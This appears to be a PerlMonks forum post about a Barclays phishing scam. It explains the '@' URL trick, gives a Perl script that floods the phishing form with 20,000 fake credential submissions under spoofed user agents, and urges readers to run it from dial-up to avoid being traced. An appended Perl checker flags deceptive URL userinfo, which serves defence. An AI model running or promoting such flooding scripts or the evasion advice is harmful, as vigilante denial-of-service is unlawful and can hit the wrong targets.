http://www.perlmonks.org?node_id=302603

OK so we all get SPAM. Perhaps you are like me and occasionally toy with the idea of mail bombing the spammers' servers. Perhaps you worry about hitting the wrong target. Perhaps you don't care that much.

For some reason today I decided to care. The subject was yet another SPAM from the Internet Banking Fraudsters who want you to confirm all your login details so they can empty your accounts. Sadly people do and are now losing out as the banks have issued warnings that effectively make it the client's problem.

So I got a new email today. Yet another bank scam. Here is the link purporting to be from Barclays bank and asking for all my user login details:

http://barclays.co.uk:ac-x6LC0IQr2aBda1XBALgF@dxp0fas94.CjB.NeT/?LdZJtDpTt8z1elD

Note the @ in the URL (add one to a URL if you don't know what it does, i.e. http://here.com@go.there.com ends up at go.there.com).

You end up with two windows. The main one is the REAL Barclays site but the pop up that comes before it is the scam: barcl.pisem.net/welcome3.html

Have a look at the source (it is ripped off from the ib.national.com.au scam - note that they have not even fixed the style sheet link)

If you feel in the mood to strike back then you might like to run this little script in the background for a while. All the script does is fill in the form with random data designed to look exactly like real data would. The desired result is to ruin the scam logs so if there is anyone stupid enough to fill in this form (there will be) their valid data should get lost in all this useless data. The random data should be identical to valid data making it impossible to automatically parse out:

```perl
#!/usr/bin/perl
use LWP::UserAgent;

my $ua = LWP::UserAgent->new;
my $SLEEP = 1;
my $DEBUG = 1;
my $LOG_FILL = 20,000;  # how many entries will we add to the scam log?

while(1) {
    my $IE  = sprintf "%.1f", ( 5.0, 5.1, 5.5, 6.0, 6.1 )[rand(5)];
    my $WIN = sprintf "%.1f", ( 4.0, 4.1, 5.1 )[rand(3)];
    my $bs  = join '', map{ ('a'..'z')[rand(26)] }1..(rand(5)+3);
    my $agent = "Mozilla/4.0 (compatible; MSIE $IE; Windows NT $WIN; $bs)";
    $ua->agent( $agent );
    $DEBUG && print $agent, $/;
    my $user = sprintf "%08d", rand(99999999);
    my $pass = sprintf "%05d", rand(99999);
    my $name = ucfirst join '', map{ ('a'..'z')[rand(26)] }1..(rand(5)+3);
    my $word = join '', map{ ('a'..'z')[rand(26)] }1..(rand(3)+5);
    my $url = "http://barcl.pisem.net/obr2.html?name=$name&user=$user&pass=$pass&word=$wordgo=hm&loginButton=%20%20Verify%20%20";
    $DEBUG && print $url, $/;
    my $request = HTTP::Request->new( 'GET', $url );
    my $response = $ua->request( $request );
    $DEBUG && print $response->content;
    sleep $SLEEP;
    $LOG_FILL--;
    die "Done!\n" if $LOG_FILL == 0;
}
```

Yes this is in effect a request for a community DOS attack. While I do not condone DOS it seems to me that if a few Internet savvy people examine the evidence, can make a positive ID, and can see a valid opportunity to prevent scams like this from making enough money to be worthwhile... why not? You WILL probably save at least one person from losing their life savings and that has to be a good thing.

Because of the warnings the banks are issuing anyone who fills in one of these forms and loses money has basically done their dough. This is theft pure and simple. Personally I think the banks ought to be DOSing these guys and hosing them off the Internet.

Don't get mad, get even

I suppose I could ask one of my more dubious associates to take the server down but that would probably hurt innocent users as well. Sure I have reported it to Barclays but the server is in Russia so they will not really be able to stop it. They probably don't care as their disclaimer makes it THE CLIENT'S problem. If everyone who knows a little Perl and gets these emails was to respond likewise we could put these creeps out of business in a week. Minimum collateral damage and it should really annoy the scamsters. Do it from dial up and they will never be able to track you down either. I would not run it from a fixed IP 'cause they will probably be pretty pissed off.
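
The `@` trick noted in the post can be checked for mechanically. The following is an added example, not part of the original post: it uses the URI module (installed alongside LWP) to report the host a link really connects to and to flag links whose user-name part is dressed up as a different hostname. The function name `inspect_link` and the verdict labels are made up for this illustration.

```perl
#!/usr/bin/perl
# Added example: flag links whose userinfo part (before the '@') is dressed
# up as a trusted hostname, as in the phishing link quoted in the post.
use strict;
use warnings;
use URI;

# Returns a hashref describing where a link really goes.
sub inspect_link {
    my ($link) = @_;
    my $uri = URI->new($link);
    return { link => $link, verdict => 'not-http' }
        unless $uri->scheme && $uri->scheme =~ /^https?$/;

    my $host     = lc( $uri->host // '' );   # the host the browser connects to
    my $userinfo = $uri->userinfo;           # everything between '//' and '@'
    my %r = ( link => $link, real_host => $host, verdict => 'ok' );
    return \%r unless defined $userinfo;

    # The part before the first ':' is the "user name"; phishers put a
    # trusted domain there so the link reads as if it pointed at the bank.
    my ($user) = split /:/, $userinfo, 2;
    $user //= '';
    $r{decoy} = lc($user);
    my $looks_like_host = $user =~ /^[a-z0-9-]+(?:\.[a-z0-9-]+)+$/i;
    $r{verdict} = ( $looks_like_host && lc($user) ne $host )
        ? 'deceptive-userinfo'   # user name looks like a different hostname
        : 'has-userinfo';        # credentials in a URL: still worth a look
    return \%r;
}

# Constructed sample input: the link from the post plus two controls.
my @samples = (
    'http://barclays.co.uk:ac-x6LC0IQr2aBda1XBALgF@dxp0fas94.CjB.NeT/?LdZJtDpTt8z1elD',
    'http://here.com@go.there.com',
    'http://www.example.com/login',
);

for my $r ( map { inspect_link($_) } @samples ) {
    printf "%-18s real=%-20s decoy=%s\n",
        $r->{verdict}, $r->{real_host} // '-', $r->{decoy} // '-';
}
```

A mail filter or proxy can run the same check over every link in a message body and rewrite or quarantine anything that comes back `deceptive-userinfo`.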